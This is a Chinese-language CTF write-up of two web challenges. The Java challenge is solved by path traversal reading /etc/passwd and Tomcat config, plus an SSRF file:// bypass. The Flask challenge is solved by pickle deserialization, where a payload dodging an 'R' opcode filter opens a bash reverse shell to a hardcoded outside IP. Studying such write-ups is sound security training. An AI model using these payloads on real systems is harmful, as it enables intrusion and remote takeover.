java_url
hint
/download?filename=/upload/xxx.jpg
读passwd进行测试,可读
/download?filename=../../../../../../../../../etc/passwd
尝试读flag,发现被过滤
/testURL?url=http://127.0.0.1/download?filename=../../../../../../../../../flag
读配置文件,发现java类
/download?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml
读类源码
/download?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/com/test2/aaa1/download.class
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<servlet>
<servlet-name>testurl</servlet-name>
<servlet-class>com.test2.aaa1.testURL</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>testurl</servlet-name>
<url-pattern>/testURL</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>download</servlet-name>
<servlet-class>com.test2.aaa1.download</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>download</servlet-name>
<url-pattern>/download</url-pattern>
</servlet-mapping>
</web-app>
java支持协议:
- file
- http
- https
- ftp
- netdoc
- gopher
download.class
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package com.test2.aaa1;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.URLEncoder;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class download extends HttpServlet {
private static final long serialVersionUID = 1L;
public download() {
}
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
this.doPost(request, response);
}
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String fileName = request.getParameter("filename");
if (fileName.contains("environ")) {
response.getWriter().write("false");
} else {
fileName = new String(fileName.getBytes("ISO8859-1"), "UTF-8");
System.out.println("filename=" + fileName);
if (fileName != null && fileName.toLowerCase().contains("flag")) {
request.setAttribute("message", "no no no ");
request.getRequestDispatcher("/message2.jsp").forward(request, response);
} else {
String fileSaveRootPath = this.getServletContext().getRealPath("/WEB-INF/upload");
String path = this.findFileSavePathByFileName(fileName, fileSaveRootPath);
File file = new File(path + "/" + fileName);
if (!file.exists()) {
request.setAttribute("message", "error");
request.getRequestDispatcher("/message2.jsp").forward(request, response);
} else {
String realname = fileName.substring(fileName.indexOf("_") + 1);
response.setHeader("content-disposition", "attachment;filename=" + URLEncoder.encode(realname, "UTF-8"));
FileInputStream in = new FileInputStream(path + "/" + fileName);
ServletOutputStream out = response.getOutputStream();
byte[] buffer = new byte[1024];
boolean var11 = false;
int len;
while((len = in.read(buffer)) > 0) {
out.write(buffer, 0, len);
}
in.close();
out.close();
}
}
}
}
public String findFileSavePathByFileName(String filename, String saveRootPath) {
int hashCode = filename.hashCode();
int dir1 = hashCode & 15;
int dir2 = (hashCode & 240) >> 4;
String dir = saveRootPath + "/" + dir1 + "/" + dir2;
File file = new File(dir);
if (!file.exists()) {
file.mkdirs();
}
return dir;
}
}
testURL.class
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package com.test2.aaa1;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class testURL extends HttpServlet {
public testURL() {
}
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
this.doPost(req, resp);
}
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String tartget_url = req.getParameter("url");
String pri = tartget_url.substring(0, tartget_url.indexOf(":"));
if (pri.matches("(?i)file|(?i)gopher|(?i)data")) {
resp.getWriter().write(String.valueOf((new StringBuilder()).append("false")));
} else {
resp.getWriter().write(String.valueOf(this.getContent(tartget_url)));
}
}
public StringBuilder getContent(String url) throws IOException {
URL urL = new URL(url);
URLConnection con = urL.openConnection();
BufferedReader in = new BufferedReader(new InputStreamReader(con.getInputStream()));
StringBuilder content = new StringBuilder();
String inputLine;
while((inputLine = in.readLine()) != null) {
content.append(inputLine);
content.append("n");
}
return content;
}
}
payload:
url:file:///flag
ez_python
<!-- ?pic=1.jpg -->
base64解码读源码,得app.py
import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file
app = Flask(__name__)
class User():
def __init__(self,name,age):
self.name = name
self.age = age
def check(s):
if b'R' in s:
return 0
return 1
@app.route("/")
def index():
try:
user = base64.b64decode(request.cookies.get('user'))
if check(user):
user = pickle.loads(user)
username = user["username"]
else:
username = "bad,bad,hacker"
except:
username = "CTFer"
pic = '{0}.jpg'.format(random.randint(1,7))
try:
pic=request.args.get('pic')
with open(pic, 'rb') as f:
base64_data = base64.b64encode(f.read())
p = base64_data.decode()
except:
pic='{0}.jpg'.format(random.randint(1,7))
with open(pic, 'rb') as f:
base64_data = base64.b64encode(f.read())
p = base64_data.decode()
return render_template('index.html', uname=username, pic=p )
if __name__ == "__main__":
app.run('0.0.0.0',port=8888)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welecom to C4T's page!</title>
</head>
<body>
hello, , Welecom to my page!!!<br/>
<img src="data:image/jpg;base64,"/>
<!-- ?pic=1.jpg -->
</body>
</html>
参考链接:https://zhuanlan.zhihu.com/p/361349643
import base64
data=b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/175.24.73.30/2333 0>&1"'
o.'''
print(base64.b64encode(data))
results matching ""
No results matching ""
相关推荐: 重温 2021 虎符杯 CTF Internal System
前言解题JS 弱类型登录绕过SSRF 拿到 HintNodeJS 8 HTTP 拆分实现的 SSRF 攻击开始攻击Ending......前言前段时间让炒币弄的没心思学习,现在全赔光了,终于可以安下心了好好学学习了……今天复现了前段时间虎符杯中 "Intern…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论